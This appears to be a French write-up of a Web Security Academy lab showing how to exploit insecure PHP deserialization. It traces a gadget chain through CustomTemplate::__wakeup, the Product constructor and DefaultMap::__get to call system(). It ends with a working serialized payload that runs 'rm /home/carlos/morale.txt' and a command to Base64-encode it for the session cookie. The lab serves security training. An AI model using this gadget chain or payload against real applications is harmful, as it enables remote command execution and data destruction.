Chaîne personnalisée pour une désérialisation PHP (gadget chain)

Developing a custom gadget chain for PHP deserialization

Lab: Developing a custom gadget chain for PHP deserialization | Web Security AcademyWebSecAcademy

L’application stocke la session dans une cookie sérialisée + encodée en Base64. Lors de la désérialisation, certains magic methods s’exécutent automatiquement (notamment __wakeup()), ce qui ouvre la voie à une chaîne de gadgets menant à une exécution de commande.

Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJyOXphcmJxN3ZncmxrdTY1dTdyb3dzeW9wODN4aWtoYyI7fQ%3d%3d

O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"r9zarbq7vgrlku65u7rowsyop83xikhc";}

On retrouve le commentaire suivant

    <!-- TODO: Refactor once /cgi-bin/libs/CustomTemplate.php is updated -->

Fichier lisible avec le ~

/cgi-bin/libs/CustomTemplate.php~

1) Analyse du code (fichier backup `CustomTemplate.php~`)

<?php

class CustomTemplate {
    private $default_desc_type;
    private $desc;
    public $product;

    public function __construct($desc_type='HTML_DESC') {
        $this->desc = new Description();
        $this->default_desc_type = $desc_type;
        // Carlos thought this is cool, having a function called in two places... What a genius
        $this->build_product();
    }

    public function __sleep() {
        return ["default_desc_type", "desc"];
    }

    public function __wakeup() {
        $this->build_product();
    }

    private function build_product() {
        $this->product = new Product($this->default_desc_type, $this->desc);
    }
}

class Product {
    public $desc;

    public function __construct($default_desc_type, $desc) {
        $this->desc = $desc->$default_desc_type;
    }
}

class Description {
    public $HTML_DESC;
    public $TEXT_DESC;

    public function __construct() {
        // @Carlos, what were you thinking with these descriptions? Please refactor!
        $this->HTML_DESC = '<p>This product is <blink>SUPER</blink> cool in html</p>';
        $this->TEXT_DESC = 'This product is cool in text';
    }
}

class DefaultMap {
    private $callback;

    public function __construct($callback) {
        $this->callback = $callback;
    }

    public function __get($name) {
        return call_user_func($this->callback, $name);
    }
}

?>

Point d’entrée automatique : `CustomTemplate::__wakeup()`

Pendant unserialize(), PHP appelle automatiquement __wakeup().
Ici, __wakeup() appelle build_product().

Propagation vers `Product`

build_product() fait :

new Product($this->default_desc_type, $this->desc)

Et dans Product::__construct() :

$this->desc = $desc->$default_desc_type;

Donc le code tente d’accéder à une propriété dynamique sur l’objet $desc, avec comme nom la valeur contrôlable $default_desc_type.

Gadget décisif : `DefaultMap::__get($name)`

Si $desc est un objet DefaultMap :

il n’a pas de propriété réelle appelée HTML_DESC / TEXT_DESC / ou autre chaîne qu’on impose,
donc PHP déclenche __get($name),
__get() fait : call_user_func($this->callback, $name).

Si on met callback = "system", on obtient system($name).

2) Objectif de la chaîne

Exécuter :

system("rm /home/carlos/morale.txt")

3) Construction de la chaîne (logique)

On fabrique un objet :

CustomTemplate->default_desc_type = "rm /home/carlos/morale.txt" (ce sera le “nom de propriété” demandé à DefaultMap, donc l’argument passé à system)
CustomTemplate->desc = objet DefaultMap
DefaultMap->callback = "system"

Déroulé à la désérialisation :

unserialize() → appelle CustomTemplate::__wakeup()
__wakeup() → build_product() → instancie Product
Product::__construct() fait $desc->$default_desc_type
$desc est DefaultMap et la propriété n’existe pas → DefaultMap::__get($name)
__get() → call_user_func("system", $name) → exécute la commande

4) Payload PHP sérialisé (attention aux longueurs)

Payload sérialisé :

O:14:"CustomTemplate":2:{s:17:"default_desc_type";s:26:"rm /home/carlos/morale.txt";s:4:"desc";O:10:"DefaultMap":1:{s:8:"callback";s:6:"system";}}

Commande :

echo 'O:14:"CustomTemplate":2:{s:17:"default_desc_type";s:26:"rm /home/carlos/morale.txt";s:4:"desc";O:10:"DefaultMap":1:{s:8:"callback";s:6:"system";}}' | base64 -w 0 ; echo

Mis à jour il y a 2 mois

hashtagDeveloping a custom gadget chain for PHP deserialization

hashtag1) Analyse du code (fichier backup CustomTemplate.php~)

hashtagPoint d’entrée automatique : CustomTemplate::__wakeup()

hashtagPropagation vers Product

hashtagGadget décisif : DefaultMap::__get($name)

hashtag2) Objectif de la chaîne

hashtag3) Construction de la chaîne (logique)

hashtag4) Payload PHP sérialisé (attention aux longueurs)

hashtagEncodage Base64 pour la cookie